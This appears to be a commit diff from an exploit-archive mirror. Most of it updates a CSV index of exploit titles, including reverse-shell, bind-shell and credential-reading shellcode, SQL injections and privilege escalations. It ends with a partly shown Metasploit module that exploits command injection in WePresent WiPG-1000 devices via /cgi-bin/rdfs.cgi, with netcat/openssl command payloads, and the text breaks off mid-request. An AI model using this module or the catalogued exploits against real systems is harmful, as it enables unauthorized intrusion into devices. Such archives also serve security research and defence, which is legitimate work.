DB: 2017-04-26

26 new exploits PHP 5.4.0RC6 (x64t) - Denial of Service PHP 5.4.0RC6 (x64) - Denial of Service Evostream Media Server 1.7.1 (x64) - Denial of Service PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH) VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write Dmitry 1.3a - Local Buffer Overflow Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write Apple Safari - Array concat Memory Corruption Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free VirtualBox - Cooperating VMs can Escape from Shared Folder PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config VirtualBox 5.0.32 r112930 x64 - Windows Process COM Injection Privilege Escalation Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation Dell Customer Connect 1.3.28.0 - Privilege Escalation LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit Nginx 1.4.0 (Generic Linux x64) - Remote Exploit Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution Microsoft Office Word - Malicious Hta Execution (Metasploit) WePresent WiPG-1000 - Command Injection (Metasploit) OSX/Intel - setuid shell x86_64 Shellcode (51 bytes) OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes) OSX/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes) OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes) Linux x86 / x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes) Linux x86 / x86_64 - tcp_bind (Port 4444) Shellcode (251 bytes) Linux x86 / x86_64 - Read /etc/passwd Shellcode (156 bytes) Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes) Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes) Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x86-64 - Egghunter Shellcode (38 bytes) Linux/x86-64 - Reverse Shell Shellcode (84 bytes) FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery WordPress Plugin KittyCatfish 2.2 - SQL Injection WordPress Plugin Car Rental System 2.5 - SQL Injection WordPress Plugin Wow Viral Signups 2.1 - SQL Injection WordPress Plugin Wow Forms 2.1 - SQL Injection Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection October CMS 1.0.412 - Multiple Vulnerabilities
2017-04-26 05:01:18 +00:00 · 2017-04-26 05:01:18 +00:00 · 9e9bf495c2
commit 9e9bf495c2
parent dadce54852
29 changed files with 4163 additions and 91 deletions
--- a/files.csv
+++ b/files.csv
@ -2129,7 +2129,7 @@ id,file,description,date,author,platform,type,port
 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0
 18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0
 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0
-18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64t) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0
+18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0
 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0
 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0
 18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0
@ -5397,7 +5397,7 @@ id,file,description,date,author,platform,type,port
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
-41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
+41547,platforms/win_x86-64/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",win_x86-64,dos,0
 41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
 41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
 41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0
@ -5442,6 +5442,7 @@ id,file,description,date,author,platform,type,port
 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
 41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
 41916,platforms/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,windows,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@ -5471,9 +5472,12 @@ id,file,description,date,author,platform,type,port
 41880,platforms/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",windows,dos,0
 41891,platforms/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",windows,dos,445
 41893,platforms/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos,0
-41905,platforms/multiple/dos/41905.txt,"VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0
+41898,platforms/linux/dos/41898.txt,"Dmitry 1.3a - Local Buffer Overflow",2017-04-19,FarazPajohan,linux,dos,0
-41906,platforms/multiple/dos/41906.txt,"VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0
+41905,platforms/multiple/dos/41905.txt,"Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0
 41906,platforms/multiple/dos/41906.txt,"Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0
 41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
 41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 -  Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8907,8 +8911,8 @@ id,file,description,date,author,platform,type,port
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
 41542,platforms/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
-41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
+41597,platforms/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
-41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,windows,local,0
+41605,platforms/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,win_x86-64,local,0
 41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
 41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
 41675,platforms/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0
@ -8950,9 +8954,12 @@ id,file,description,date,author,platform,type,port
 41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0
 41901,platforms/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
 41902,platforms/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
-41904,platforms/multiple/local/41904.txt,"VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
+41904,platforms/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
-41907,platforms/linux/local/41907.c,"VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local,0
+41907,platforms/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local,0
-41908,platforms/windows/local/41908.txt,"VirtualBox 5.0.32 r112930 x64 - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
+41908,platforms/win_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",win_x86-64,local,0
 41917,platforms/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local,0
 41923,platforms/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local,0
 41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -14017,7 +14024,7 @@ id,file,description,date,author,platform,type,port
 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
 33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443
 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0
-32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
+32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
 30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0
 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0
 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0
@ -15462,6 +15469,9 @@ id,file,description,date,author,platform,type,port
 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
 41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0
 41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0
 41929,platforms/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote,0
 41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - Malicious Hta Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
 41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15876,7 +15886,7 @@ id,file,description,date,author,platform,type,port
 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
-15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
+15618,platforms/osx/shellcode/15618.c,"OSX/Intel (x86-64) - setuid shell  Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
 15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
 16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0
@ -15884,7 +15894,7 @@ id,file,description,date,author,platform,type,port
 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
-17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
+17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
 17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
@ -16004,9 +16014,9 @@ id,file,description,date,author,platform,type,port
 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
-39336,platforms/linux/shellcode/39336.c,"Linux x86 / x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39337,platforms/linux/shellcode/39337.c,"Linux x86 / x86_64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39338,platforms/linux/shellcode/39338.c,"Linux x86 / x86_64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
@ -16034,7 +16044,7 @@ id,file,description,date,author,platform,type,port
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
-39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
+39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
 39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0
 39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@ -16078,10 +16088,10 @@ id,file,description,date,author,platform,type,port
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux - TCP Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
-41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
+41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
-41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
+41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
@ -37767,3 +37777,14 @@ id,file,description,date,author,platform,type,port
 41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
 41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0
 41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0
 41919,platforms/php/webapps/41919.txt,"WordPress Plugin KittyCatfish 2.2 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
 41920,platforms/php/webapps/41920.txt,"WordPress Plugin Car Rental System 2.5 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
 41921,platforms/php/webapps/41921.txt,"WordPress Plugin Wow Viral Signups 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
 41922,platforms/php/webapps/41922.txt,"WordPress Plugin Wow Forms 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
 41925,platforms/xml/webapps/41925.txt,"Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE",2017-04-25,ERPScan,xml,webapps,0
 41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0
 41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0
 41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
 41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
--- a/platforms/hardware/remote/41935.rb
+++ b/platforms/hardware/remote/41935.rb
@ -0,0 +1,74 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'WePresent WiPG-1000 Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in an undocumented
        CGI file in several versions of the WePresent WiPG-1000 devices.
        Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matthias Brun', # Vulnerability Discovery, Metasploit Module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
        ],
      'Payload'        =>
        {
          'Compat'     =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat openssl'
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['WiPG-1000 <=2.0.0.7', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 20 2017',
      'DefaultTarget'  => 0))
  end
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/cgi-bin/rdfs.cgi'
    })
    if res && res.body.include?("Follow administrator instructions to enter the complete path")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end
  def exploit
    print_status('Sending request')
    send_request_cgi(
      'method' => 'POST',
      'uri'    => '/cgi-bin/rdfs.cgi',
      'vars_post' => {
